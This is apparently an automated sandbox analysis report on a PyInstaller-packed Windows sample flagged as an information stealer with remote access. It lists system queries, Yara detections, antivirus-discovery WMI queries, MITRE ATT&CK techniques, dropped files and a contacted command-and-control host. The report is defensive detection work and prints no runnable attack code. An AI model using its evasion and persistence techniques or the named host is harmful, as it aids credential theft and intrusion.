Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeQueries volume information: C:\Users\user\AppData\Roaming\System User.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeQueries volume information: C:\Users\user\AppData\Roaming\System User.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeQueries volume information: C:\Users\user\AppData\Roaming\System User.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeQueries volume information: C:\Users\user\AppData\Roaming\System User.exe VolumeInformation
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF58D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7FF58D080
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A5EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7FF5A5EEC
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
Source: msedge.exe, 0000000C.00000002.2749735501.000000001B4E3000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2737051425.0000000000919000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2749735501.000000001B536000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2749735501.000000001B499000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msedge.exe PID: 5560, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msedge.exe PID: 5560, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count the report shows beside that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (12); Native API (1); Command and Scripting Interpreter (1); Scheduled Task/Job (2); PowerShell (1); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Scheduled Task/Job (2); Registry Run Keys / Startup Folder (21); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Process Injection (12); Scheduled Task/Job (2); Registry Run Keys / Startup Folder (21); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (12); Software Packing (2); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (151); Process Injection (12)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); File and Directory Discovery (2); System Information Discovery (34); Query Registry (1); Security Software Discovery (561); Process Discovery (2); Virtualization/Sandbox Evasion (151); Application Window Discovery (1); System Network Configuration Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1579069; Sample: YgJ5inWPQO.exe; Startdate: 20/12/2024; Architecture: WINDOWS; Score: 100)

Contacted at the top level: hope-asia.gl.at.ply.gg; www.nodejs.org; 7 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures

Process tree as drawn in the graph:

- YgJ5inWPQO.exe
  - dropped: C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\select.pyd (PE32+); C:\Users\user\AppData\Local\...\python313.dll (PE32+); 7 other malicious files
  - signature: Found pyInstaller with non standard icon
  - YgJ5inWPQO.exe
